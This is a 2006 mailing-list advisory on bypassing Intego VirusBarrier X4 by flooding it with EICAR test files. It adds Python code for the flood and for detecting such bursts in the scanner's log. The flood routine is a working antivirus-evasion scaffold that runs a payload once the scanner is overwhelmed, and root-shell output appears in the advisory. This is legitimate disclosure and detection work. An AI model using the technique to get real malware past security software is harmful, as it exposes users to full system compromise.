
Intego VirusBarrier X4 definition bypass exploit [K F (lists)]




I think the list spam trap ate this message a few weeks ago.


Message-ID: <45528089.9070802@digitalmunition.com>
Date: Wed, 08 Nov 2006 20:12:41 -0500
From: "K F (lists)"
To: bugtraq@securityfocus.com
Subject: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'


This was supposed to go out on Halloween but it didn't... but either way 
all you Mac users can get scared or something. OOGA BOOGA!



[Attachment: pwntego.tar.gz (base64 content not included in the archive)]

DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com 
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References: 
http://www.digitalmunition.com/DMA[2006-1031a].txt 

Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the 
leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming 
from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet 
or other types of networks.

Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and 
writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With 
Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against 
viruses of all kinds.

Although VirusBarrier does a good job of halting malicious activity, the product currently suffers from a flaw related to the 
number of alerts it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very 
short amount of time, he or she may be able to cause VirusBarrier to completely ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further spreading of malware.

As an example we will first show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then 
we will demonstrate how the VirusBarrier protection can be bypassed using a simple flood of EICAR test files. 

Any typical attempt to access or execute a file or program that matches a VirusBarrier definition results in an alert in the
user interface. There is a sweet-looking insulin bottle on the screen that slowly empties as the virus nears eradication. 

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do ('Ignore' || 'Repair')? 

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all. 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

On the other hand, if you choose 'Repair', the process is terminated dead in its tracks and the file is nulled out: 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit 
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under normal circumstances this would be adequate to stop a 
malicious attack. 

If, however, an attacker floods the file system with dummy virus files at a quick rate, VirusBarrier will promptly stop 
responding after presenting the user with a few audible and visual alerts. After roughly 40 infected files in a row the 
system becomes confused, and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files.)

When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following: 

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attacker's standpoint, exploitation is fairly quick and simple. Our example uses a local root exploit; however, this tactic
could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a 
precursor to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A, B, C and D would 
then be completely useless and an E variant would be born. 

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl      Pwntego.sh      README.txt      pwntego.uu      rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl 
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied

In the above example 'OSX.ExploitMachex.A' is executed on a machine that is actively protected by VirusBarrier. In a matter of 
seconds the Intego engine is flooded and the attacker's code runs as if Intego's virus and malware definitions did not exist. 
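The decoy flood that rand-eicar.pl and Pwntego.pl perform, as an added example written in Python for this page (it is not code from the advisory or from the pwntego archive): it writes a burst of randomly named EICAR test files into a scratch directory and then runs a caller-supplied payload in the window the advisory describes. The file-name shape (modeled on the log excerpt), the use of a tempfile directory instead of /private/tmp, the default count of 40 (the advisory's observation; Intego's confirmed limit is 20) and the benign placeholder payload are assumptions; no exploit is included.

```python
import os
import random
import tempfile
import time

# The 68-byte EICAR test string, split in two so that this source file does
# not itself match antivirus signatures; every file written below contains
# the whole string and will be flagged by any scanner that knows EICAR.
EICAR = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def random_name():
    """File name shaped like the advisory's log excerpt ('0.928154556620033'),
    i.e. a Perl rand() value (assumption about rand-eicar.pl's naming)."""
    return "0." + "".join(random.choice("0123456789") for _ in range(15))


def make_target_dir():
    """Scratch directory to flood; the advisory used /private/tmp."""
    return tempfile.mkdtemp(prefix="pwntego-")


def flood_eicar(directory, count=40, interval=0.0):
    """Drop `count` EICAR files with random names into `directory`.

    Each file is a positive signature match, so each costs the on-access
    scanner one alert. `interval` (seconds) spaces the writes; 0 reproduces
    the burst in the advisory, where the whole run fits in a few seconds.
    Returns the paths written, in order.
    """
    written = []
    while len(written) < count:
        path = os.path.join(directory, random_name())
        if os.path.exists(path):        # rand() collisions happen; pick again
            continue
        with open(path, "w") as fh:
            fh.write(EICAR)
        written.append(path)
        if interval:
            time.sleep(interval)
    return written


def run_after_flood(directory, payload, count=40):
    """Ordering used by the attack: saturate the alert queue first, then run
    `payload` (any callable) while the engine is still busy with the decoys.
    Returns (decoy paths, payload return value). The advisory's payload was a
    local root exploit; here the caller supplies whatever stands in for it."""
    decoys = flood_eicar(directory, count=count)
    return decoys, payload()


def read_decoy(path):
    """Bytes of one decoy file (a 'Repair' by the scanner nulls it to 0 bytes)."""
    with open(path, "rb") as fh:
        return fh.read()


def cleanup(directory, paths):
    """Remove the decoys and the scratch directory; returns how many were removed."""
    removed = 0
    for path in paths:
        try:
            os.remove(path)
            removed += 1
        except OSError:
            pass                        # already gone, or locked by the scanner
    try:
        os.rmdir(directory)
    except OSError:
        pass
    return removed


if __name__ == "__main__":
    target = make_target_dir()
    decoys, result = run_after_flood(target, lambda: "payload ran", count=40)
    print("%d decoys in %s; payload returned %r" % (len(decoys), target, result))
    print("removed %d" % cleanup(target, decoys))
```

On a host with an on-access scanner the decoys are what trips the alert limit; on a host without one the script just writes and removes 40 harmless files, which is the point of using EICAR rather than real malware for the flood.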

One fun side effect of this attack is that the user must manually dismiss a number of alerts. The user is either forced to wait for 
each alert to time out on its own after several seconds or to respond individually to each one. 

This attack has a fairly obvious signature in VirusBarrier's log if the attacker is using the example code provided in this text. 
Obviously, using random viruses and better randomized locations and names is a possible vector for a crafty attacker.  

virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log 
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
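A detector for the log signature just shown, as an added example that is not part of the advisory: it parses 'File infected' lines in the vbmgvx.log format of the excerpt and flags any run of 20 or more detections inside a five-second sliding window, 20 being the per-file limit Intego confirmed. The sample log is constructed to resemble the excerpt (one real detection, then 22 EICAR hits in four seconds); the window size and the trailing non-infection line are assumptions.

```python
import re
from collections import Counter
from datetime import datetime

# "File infected" lines as written to /var/log/vbmgvx.log in the excerpt;
# any other line is ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) - File infected: "
    r"(?P<path>.+?) by (?P<sig>.+?)\s*$"
)


def parse_line(line):
    """Return (timestamp, path, signature) for an infection line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("path"), m.group("sig")


def find_bursts(lines, threshold=20, window_seconds=5):
    """Flag runs of `threshold` or more detections inside `window_seconds`.

    A burst opens when the sliding window first holds `threshold` events and
    stays open while the window remains at or above it. Returns one dict per
    burst: start, end, count, and a Counter of the signatures involved, so a
    wall of 'EICAR Test' hits stands out from a genuine detection.
    """
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e[0])
    bursts, current, start = [], None, 0
    for end, (ts, _path, sig) in enumerate(events):
        while (ts - events[start][0]).total_seconds() > window_seconds:
            start += 1                      # slide the window forward
        in_window = end - start + 1
        if in_window >= threshold:
            if current is None:
                current = {"start": events[start][0], "end": ts, "count": in_window,
                           "signatures": Counter(e[2] for e in events[start:end + 1])}
            else:
                current["end"] = ts
                current["count"] += 1
                current["signatures"][sig] += 1
        elif current is not None:
            bursts.append(current)
            current = None
    if current is not None:
        bursts.append(current)
    return bursts


def constructed_log():
    """Made-up log modeled on the advisory's excerpt (not real data): one
    real detection, 22 EICAR hits across four seconds, one unrelated line."""
    lines = ["Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A"]
    hits_per_second = {35: 1, 36: 8, 37: 7, 38: 6}
    n = 0
    for second, hits in hits_per_second.items():
        for _ in range(hits):
            n += 1
            lines.append("Tue Oct 31 02:03:%02d 2006 - File infected: /private/tmp/0.%015d by EICAR Test"
                         % (second, n))
    # Hypothetical non-infection line, included to show it is skipped.
    lines.append("Tue Oct 31 02:03:40 2006 - Definitions updated")
    return lines


if __name__ == "__main__":
    for b in find_bursts(constructed_log()):
        print("%s .. %s: %d detections %s"
              % (b["start"].time(), b["end"].time(), b["count"], dict(b["signatures"])))
```

Run it against a real vbmgvx.log with `find_bursts(open(path).readlines())`; the log only records what the scanner managed to alert on, so once the engine is saturated the genuinely malicious file may be absent from it, which is why the burst itself, not the signature name, is the indicator.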

With the current fixes in place, once VirusBarrier gets 19 alerts, any further malware is simply quarantined until the administrator can
repair it. In our example, the additional processes get a permission error when they are executed.

Of course since everyone knows there is no malware for Macintosh this scenario would quite simply never be encountered..... *smirk* 

The Intego staff was more than helpful and willing to address this issue in a timely fashion. After communications were established
this problem was addressed, and fixes were out the door to customers in a matter of 2 days. How about that for turnaround time!

Workaround: 

Please update to the latest version of Intego VirusBarrier and the latest Vdefs. 
http://www.intego.com/services/updates.asp?product=VirusBarrier 

Intego has fixed this bug in the 2006/11/01 Vdef files.
